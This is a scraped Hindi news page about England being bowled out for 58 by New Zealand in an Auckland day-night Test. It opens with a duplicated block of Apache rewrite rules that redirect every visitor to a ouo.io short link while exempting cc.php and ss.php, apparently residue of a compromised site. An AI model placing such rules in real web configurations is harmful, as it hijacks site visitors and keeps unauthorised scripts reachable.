
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 314
Previousनई दिल्ली। इंग्लैंड के बल्लेबाजों ने आज ऑकलैंड में शुरू हुए सीरीज के पहले डे-नाइट टेस्ट में शर्मनाक प्रदर्शन किया। इंग्लैंड की टीम दिन के पहले ही सत्र में 20.4 ओवर में 58 रन पर ढेर हो गई। यह इंग्लैंड का छठा न्यूनतम स्कोर है। कप्तान जोए रूट व बेन स्टोक्स सहित 5 बल्लेबाज खाता भी नहीं खोल पाए। 9वें नंबर पर उतरे क्रेग ओवरटन ने 25 गेंदों पर पांच चौकों व एक छक्के की मदद से सर्वाधिक नाबाद 33 रन बनाए। बाएं हाथ के तेज गेंदबाज ट्रेंट बोल्ट ने 32 रन पर छह और दाएं हाथ के तेज गेंदबाज टिम साउदी ने 25 रन देकर चार विकेट चटकाए। जवाब में न्यूजीलैंड ने स्टंप्स के समय तक पहली पारी में तीन विकेट पर 175 रन बना लिए थे।
न्यूजीलैंड की बढ़त 117 रन की हो गई है। कप्तान केन विलियमसन 91 और हामिश निकोलस 24 रन पर नाबाद हैं। टॉम लैथम (26), रॉस टेलर (20) व जीत रावल (3) पैवेलियन लौट गए। जेम्स एंडरसन ने दो और स्टुअर्ट ब्रॉड ने एक विकेट लिया है।